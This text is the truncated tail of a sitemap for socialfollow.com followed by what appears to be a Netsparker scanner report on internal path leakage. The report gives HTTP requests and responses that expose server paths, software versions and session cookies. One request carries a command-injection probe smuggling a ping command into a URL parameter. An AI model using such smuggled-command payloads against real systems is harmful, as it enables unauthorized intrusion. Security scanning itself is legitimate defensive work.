<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/03/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/future-features/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/analytics/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/blogger-institute/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/fine-art-of-blogging/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/follow-me-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/go2web20net/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/interview/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/killerstartupscom/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/multiple-languages/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/rafferty-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/raffy-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/reputation-management/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networking-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networks/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/studio98/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter-feed/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/visionwiz/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-us/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/ziipa/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-almost-launched/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-button-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/social-follow-joins-twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/banner/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barandide/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barneykavai/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barry-shereshevsky/</loc>
<changefreq>monthly</changefreq>
<pr..
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

3 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /button/

/button/

http://www.socialfollow.com/button/

Identified Internal Path(s)

/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php

Request

GET /button/ HTTP/1.1
Referer: http://www.socialfollow.com/button/image/?b=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Keep-Alive: timeout=2, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/javascript


<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warning</b>:Cannot modify header information-headers already sent by(output started at/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php:6)in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>19</b><br/>var menu={divclass:'sociallinks',inlinestyle:'visibility:hidden',linktarget:'secwin'};menu.cols={divclass:'column',inlinestyle:''};menu.items=[];var socialfollow={init:function(targetclass){socialfollow.init(targetclass);}}var socialfollow={menusmap:{},effects:{delayhide:200,shadow:{enabled:true,opacity:0.3,depth:[5,5]},fade:{enabled:false,duration:500}},dimensions:{},getoffset:function(what,offsettype){return(what.offsetParent)?what[offsettype]+this.getoffset(what.offsetParent,offsettype):what[offsettype]},getoffsetof:function(el){el._offsets={left:this.getoffset(el,"offsetLeft"),top:this.getoffset(el,"offsetTop"),h:el.offsetHeight}},getdimensions:function(menu){this.dimensions={anchorw:menu.anchorobj.offsetWidth,anchorh:menu.anchorobj.offsetHeight,docwidth:(window.innerWidth||this.standardbody.clientWidth)-20,docheight:(window.innerHeight||this.standardbody.clientHeight)-15,docscrollx:window.pageXOffset||this.standardbody.scrollLeft,docscrolly:window.pageYOffset||this.standardbody.scrollTop}if(!this.dimensions.dropmenuw){this.dimensions.dropmenuw=menu.dropmenu.offsetWidth;this.dimensions.dropmenuh=menu.dropmenu.offsetHeight;}},isContained:function(m,e){var e=window.event||e;var c=e.relatedTarget||((e.type=="mouseover")?e.fromElement:e.toElement)while(c&&c!=m)try{c=c.parentNode}catch(e){c=m}return(c==m)?true:false;},setopacity:function(el,value){el.style.opacity=value;if(typeof el.style.opacity!="string"){el.style.MozOpacity=value;if(el.filters)el.style.filter="progid:DXImageTransform.Microsoft.alpha(opacity="+value*100+")"}},showmenu:function(menuid){var menu=socialfollow.menusmap[menuid];clearTimeout(menu.hidetimer);this.getoffsetof(menu.anchorobj);this.getdimensions(menu);var posx=menu.anchorobj._offsets.left+(menu.orientation=="lr"?this.dimensions.anchorw:0);var posy=menu.anchorobj._offsets.top+this.dimensions.anchorh-(menu.orientation=="lr"?this.dimensions.anchorh:0)if(posx+this.dimensions.dropmenuw+this.effects.shadow.depth[0]>this.dimensions.docscrollx+this.dimensions.docwidth){posx=posx-this.dimensions.dropmenuw+(menu.orientation=="lr"?-this.dimensions.anchorw:this.dimensions.anchorw);}if(posy+this.dimensions.dropmenuh>this.dimensions.docscrolly+this.dimensions.docheight){posy=Math.max(posy-this.dimensions.dropmenuh-(menu.orientation=="lr"?-this.dimensions.anchorh:this.dimensions.anchorh),this.dimensions.docscrolly);}if(this.effects.fade.enabled){this.setopacity(menu.dropmenu,0);if(this.effects.shadow.enabled)this.setopacity(menu.shadow,0);}menu.dropmenu.setcss({left:posx+'px',top:posy+'px',visibility:'visible'});if(this.effects.shadow.enabled){menu.shadow.setcss({left:posx+socialfollow.effects.shadow.depth[0]+'px',top:posy+socialfollow.effects.shadow.depth[1]+'px',visibility:'visible'});}if(this.effects.fade.enabled){clearInterval(menu.animatetimer);menu.curanimatedegree=0;menu.starttime=new Date().getTime();menu.animatetimer=setInterval(function(){socialfollow.revealmenu(menuid)},20);}},revealmenu:function(menuid){var menu=socialfollow.menusmap[menuid];var elapsed=new Date().getTime()-menu.starttime;if(elapsed<this.effects.fade.duration){this.setopacity(menu.dropmenu,menu.curanimatedegree);if(this.effects.shadow.enabled)this.setopacity(menu.shadow,menu.curanimatedegree*this.effects.shadow.opacity);}else{clearInterval(menu.animatetimer);this.setopacity(menu.dropmenu,1);menu.dropmenu.style.filter="";}menu.curanimatedegree=(1-Math.cos((elapsed/this.effects.fade.duration)*Math.PI))/2;},setcss:function(param){for(prop in param){this.style[prop]=param[prop];}},hidemenu:function(menuid){var menu=socialfollow.menusmap[menuid];clearInterval(menu.animatetimer);menu.dropmenu.setcss({visibility:'hidden',left:0,top:0});menu.shadow.setcss({visibility:'hidden',left:0,top:0});},getElementsByClass:function(targetclass){if(document.querySelectorAll){return document.querySelectorAll("."+targetclass);}else{var classnameRE=new RegExp("(^|\\s+)"+targetclass+"($|\\s+)","i");var pieces=[];var alltags=document.all?document.all:document.getElementsByTagName("*");for(var i=0;i<alltags.length;i++){if(typeof alltags[i].className=="string"&&alltags[i].className.search(classnameRE)!=-1)pieces[pieces.length]=alltags[i];}return pieces;}},addDiv:function(divid,divclass,inlinestyle){var el=document.createElement("div");if(divid)el.id=divid;el.className=divclass;el.style.cssText=inlinestyle;document.body.insertBefore(el,document.body.firstChild);return el;},getmenuHTML:function(menuobj){var menucontent=[];var frag="";for(var i=0;i<menuobj.items.length;i++){if(menuobj.items[i][0]=="All Social Sites..."){frag+='<li><a href="javascript:popUp(400,100,600,300,1);" class="allSites">'+menuobj.items[i][0]+'</a></li>\n';menucontent.push(frag);frag="";}else{var socialSite=menuobj.items[i][0];var socialSiteID=menuobj.items[i][1];var socialSiteLink=menuobj.items[i][2];frag+='<li><a class="c'+socialSiteID+'" href="http://www.socialfollow.com/button/link?b=&amp;r='+document.referrer+'&amp;s='+socialSiteID+'&amp;l='+socialSiteLink+'" target="'+menuobj.linktarget+'">'+socialSite+'</a></li>\n';if(menuobj.items[i][3]=="efc"||i==menuobj.items.length-1){menucontent.push(frag);frag="";}}}if(typeof menuobj.cols=="undefined"){return'<ul>\n'+menucontent.join('')+'\n</ul>';}else{frag="<div class='show' style='padding: 0 3px;display:none'>";for(var i=0;i<menucontent.length;i++){frag+='<div class="'+menuobj.cols.divclass+'" style="'+menuobj.cols.inlinestyle+'">\n<ul>\n'+menucontent[i]+'</ul>\n</div>\n';}frag+="</div>";frag+='<div class="paddingSmall show" style="display:none"><div class="socialFollowLink"><a href="http://www.socialfollow.com/" target="_blank"><img src="http://www.socialfollow.com/button/image-link/?b=&amp;r='+document.referrer+'" border="0" alt="Get your own Social Follow button!" /></a></div></div>';frag+='<div class="bottomBorder show" style="display:none">&nbsp;</div>';return frag;}},addEvent:function(targetarr,functionref,tasktype){if(targetarr.length>0){var target=targetarr.shift()if(target.addEventListener){target.addEventListener(tasktype,functionref,false);}else if(target.attachEvent){target.attachEvent('on'+tasktype,function(){return functionref.call(target,window.event)});}this.addEvent(targetarr,functionref,tasktype);}},setupmenu:function(targetclass,anchorobj,pos){this.standardbody=(document.compatMode=="CSS1Compat")?document.documentElement:document.body;var relattr='menu';dropmenuid='menu';var dropmenuvar=window[dropmenuid];var dropmenu=this.addDiv(null,dropmenuvar.divclass,dropmenuvar.inlinestyle);dropmenu.innerHTML=this.getmenuHTML(dropmenuvar);var menu=this.menusmap[targetclass+pos]={id:targetclass+pos,anchorobj:anchorobj,dropmenu:dropmenu,revealtype:(relattr.length!=dropmenuid.length&&RegExp.$1=="click")?"click":"mouseover",orientation:anchorobj.getAttribute("rev")=="lr"?"lr":"ud",shadow:this.addDiv(null,"anylinkshadow",null)}menu.anchorobj._internalID=targetclass+pos;menu.anchorobj._isanchor=true;menu.dropmenu._internalID=targetclass+pos;menu.shadow._internalID=targetclass+pos;menu.dropmenu.setcss=this.setcss;menu.shadow.style.display="none";menu.shadow.setcss=this.setcss;menu.shadow.setcss({display:"block"});this.setopacity(menu.shadow,this.effects.shadow.opacity);this.addEvent([menu.anchorobj,menu.dropmenu,menu.shadow],function(e){var menu=socialfollow.menusmap[this._internalID];if(this._isanchor&&menu.revealtype=="mouseover"&&!socialfollow.isContained(this,e)){socialfollow.showmenu(menu.id);}else if(typeof this._isanchor=="undefined"){clearTimeout(menu.hidetimer);}},"mouseover");this.addEvent([menu.anchorobj,menu.dropmenu,menu.shadow],function(e){if(!socialfollow.isContained(this,e)){var menu=socialfollow.menusmap[this._internalID];menu.hidetimer=setTimeout(function(){socialfollow.hidemenu(menu.id)},socialfollow.effects.delayhide);}},"mouseout");this.addEvent([menu.anchorobj,menu.dropmenu],function(e){var menu=socialfollow.menusmap[this._internalID];if(this._isanchor&&menu.revealtype=="click"){if(menu.dropmenu.style.visibility=="visible"){socialfollow.hidemenu(menu.id);}else{socialfollow.showmenu(menu.id);}if(e.preventDefault){e.preventDefault();}return false}else{menu.hidetimer=setTimeout(function(){socialfollow.hidemenu(menu.id)},socialfollow.effects.delayhide);}},"click");},init:function(targetclass){var headID=document.getElementsByTagName("head")[0];var cssNode=document.createElement('link');cssNode.type='text/css';cssNode.rel='stylesheet';cssNode.href='http://www.socialfollow.com/button/css/?b=&n=&socialSites=';cssNode.media='screen';headID.appendChild(cssNode);var imgs=this.getElementsByClass(targetclass);for(var i=0;i<imgs.length;i++){if('done'!=imgs[i].getAttribute('rel')){imgs[i].setAttribute('rel','done');this.setupmenu(targetclass,imgs[i],i);this.border="0";var hidden_divs=this.getElementsByClass('show');setTimeout(function(){for(var i=0;i<hidden_divs.length;i++){if('undefined'!=typeof(hidden_divs[i].style))hidden_divs[i].style.display='';}},200);}}}}function openwindow(url){document.body.removeChild(document.getElementById('popup'));document.body.removeChild(document.getElementById('popup1'));window.open(url);}function check_browser(){var re=/\s+(X?HTML)\s+([\d\.]+)\s*([^\/]+)*\/(?:[^"]+"\s"([^"]+)")?/gi;var res=false;metaCollection=document.getElementsByTagName('meta');for(i=0;i<metaCollection.length;i++){if('X-UA-Compatible'==metaCollection[i].httpEquiv&&'IE=EmulateIE7'==metaCollection[i].content)return false;}if(typeof document.namespaces!="undefined"){res=(8==document.all[0].nodeType)?re.test(document.all[0].nodeValue):false;}else{res=(null!=document.doctype)?re.test(document.doctype.publicId):false;}if(res){res=new Object();var type=RegExp.$1;var version=RegExp.$2;var doctype_extended=RegExp.$3.toLowerCase();var doctype_url=RegExp.$4if((/strict\.dtd/.test(doctype_url)||'strict'==doctype_extended)||(('HTML'==type&&'4.01'==version)&&!/http:\/\//.test(doctype_url)))return false;return(('XHTML'==type&&'1.0'==version)||('HTML'==type&&'4.01'==version))?true:false;return result;}else{return false;}}
- /button/image/

/button/image/

http://www.socialfollow.com/button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

Identified Internal Path(s)

  • /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php
  • /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3

Request

GET /button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:09 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>6</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>7</b><br /><br /><b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b><br />
- /blog/wp-content/themes/social-follow-theme2/

/blog/wp-content/themes/social-follow-theme2/

http://www.socialfollow.com/blog/wp-content/themes/social-follow-theme2/

Identified Internal Path(s)

/var/www/vhosts/socialfollow.com/httpdocs/blog/wp-content/themes/social-follow-theme2/index.php

Request

GET /blog/wp-content/themes/social-follow-theme2/ HTTP/1.1
Referer: http://www.socialfollow.com/blog/wp-content/themes/social-follow-theme2/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=98685f18ee12a511243ce85c9241bd6b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:08:33 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 197
Keep-Alive: timeout=2, max=86
Connection: Keep-Alive
Content-Type: text/html


<br /><b>Fatal error</b>: Call to undefined function get_header() in <b>/var/www/vhosts/socialfollow.com/httpdocs/blog/wp-content/themes/social-follow-theme2/index.php</b> on line <b>7</b><br />